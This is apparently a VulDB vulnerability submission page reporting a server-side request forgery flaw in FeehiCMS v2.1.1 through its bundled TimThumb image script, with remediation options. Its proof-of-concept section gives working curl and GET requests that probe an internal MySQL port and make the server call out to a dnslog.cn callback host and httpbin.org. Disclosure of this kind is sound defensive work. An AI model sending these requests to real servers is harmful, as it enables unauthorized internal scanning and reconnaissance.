Отправить #718278: FeehiCMS https://github.com/liufee/cms v2.1.1 Server-Side Request ForgeryИнформация

НазваниеFeehiCMS https://github.com/liufee/cms v2.1.1 Server-Side Request Forgery
Описание# Server-Side Request Forgery (SSRF) Vulnerability in FeehiCMS via TimThumb **BUG_Author:** security_researcher **Affected Version:** FeehiCMS v2.1.1 (TimThumb v2.8.13) **Vendor:** [FeehiCMS GitHub Repository](https://github.com/liufee/cms) **Software:** [FeehiCMS](https://github.com/liufee/cms) **Vulnerability Files:** - `frontend/web/timthumb.php` --- ## Description: ### 1. Vulnerability Overview The FeehiCMS v2.1.1 application includes TimThumb v2.8.13, a PHP script used for image resizing and manipulation. The default configuration of TimThumb in FeehiCMS allows fetching images from arbitrary external URLs without any domain restrictions. This creates a Server-Side Request Forgery (SSRF) vulnerability that can be exploited by unauthenticated attackers. ### 2. Vulnerable Code In the file `frontend/web/timthumb.php`, the following configuration at lines 31-32 enables unrestricted external URL fetching: ```php if(! defined('ALLOW_EXTERNAL') ) define ('ALLOW_EXTERNAL', TRUE); if(! defined('ALLOW_ALL_EXTERNAL_SITES') ) define ('ALLOW_ALL_EXTERNAL_SITES', true); ``` - `ALLOW_EXTERNAL = TRUE`: Allows fetching images from external websites - `ALLOW_ALL_EXTERNAL_SITES = true`: Disables the whitelist restriction, allowing requests to ANY external domain ### 3. Exploitation #### 3.1 Internal Port Scanning **Request to scan MySQL port (3306):** ``` GET /timthumb.php?src=http://127.0.0.1:3306/ HTTP/1.1 Host: <target-ip> ``` **Response (confirms server attempted internal connection):** ```html <h1>A TimThumb error has occured</h1> The following error(s) occured:<br /> <ul><li>An error occured fetching image.</li></ul> <br /><br />Query String : src=http://127.0.0.1:3306/ <br />TimThumb version : 2.8.13 ``` This error message confirms the server attempted to connect to the internal MySQL service at `127.0.0.1:3306`. #### 3.2 Fetching External Resources **Request to fetch external image:** ``` GET /timthumb.php?src=http://httpbin.org/image/jpeg&w=200&h=200 HTTP/1.1 Host: <target-ip> ``` **Response:** The server successfully fetches the image from the external URL and returns it to the attacker, confirming the SSRF vulnerability. --- ## Proof of Concept: ### Step 1: DNSLog Verification Use DNSLog platform to verify the server makes outbound requests. 1. Get a subdomain from http://dnslog.cn (e.g., `lldvq7.dnslog.cn`) 2. Send SSRF request: ```bash curl "http://<target-ip>/timthumb.php?src=http://ssrf.lldvq7.dnslog.cn/test.jpg" ``` 3. Check DNSLog platform for DNS query records. **Response:** ```html <h1>A TimThumb error has occured</h1> The following error(s) occured:<br /> <ul><li>The remote file is not a valid image. Mimetype = &#039;&#039;</li></ul> <br /><br />Query String : src=http://ssrf.lldvq7.dnslog.cn/test.jpg ``` **DNSLog Result:** The platform shows DNS query record for `ssrf.lldvq7.dnslog.cn`, confirming the server made an outbound DNS request. ![f5c91ae13fa53579.png](https://c.img.dasctf.com/LightPicture/2025/12/f5c91ae13fa53579.png) ### Step 2: External Image Fetching ```bash curl -o /tmp/ssrf_test.jpg "http://<target-ip>/timthumb.php?src=http://httpbin.org/image/jpeg&w=100&h=100" file /tmp/ssrf_test.jpg ``` **Expected Result:** ``` /tmp/ssrf_test.jpg: JPEG image data, JFIF standard 1.01, 100x100, 7079 bytes ``` This confirms the server successfully fetched an image from an external URL. ![959a176cf7c4960b.png](https://c.img.dasctf.com/LightPicture/2025/12/959a176cf7c4960b.png) ## Remediation: ### Option 1: Disable External URL Fetching Edit `frontend/web/timthumb.php` and change: ```php define ('ALLOW_EXTERNAL', FALSE); ``` ### Option 2: Use Whitelist for Allowed Domains ```php define ('ALLOW_EXTERNAL', TRUE); define ('ALLOW_ALL_EXTERNAL_SITES', false); $ALLOWED_SITES = array ( 'your-trusted-domain.com', 'cdn.your-domain.com' ); ``` ### Option 3: Remove TimThumb Consider removing the TimThumb script entirely and using modern image processing solutions with proper security controls. --- ## References: - [TimThumb Vulnerabilities History](https://blog.sucuri.net/2011/08/timthumb-security-vulnerability-list.html) - [OWASP SSRF Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html) - [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html) --- ## Timeline: - **Discovery Date:** 2025-12-18 - **Vendor Notification:** Pending - **Public Disclosure:** Pending --- ## Disclaimer: This vulnerability report is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing for vulnerabilities.
Пользователь
 hiro (UID 93548)
Представление18.12.2025 03:14 (6 месяцы назад)
Модерация29.12.2025 16:25 (12 days later)
Статуспринято
Запись VulDB338663 [FeehiCMS до 2.1.1 TimThumb timthumb.php src эскалация привилегий]
Баллы17

ПредыдущийОбзорДалее

Do you need the next level of professionalism?

Upgrade your account now!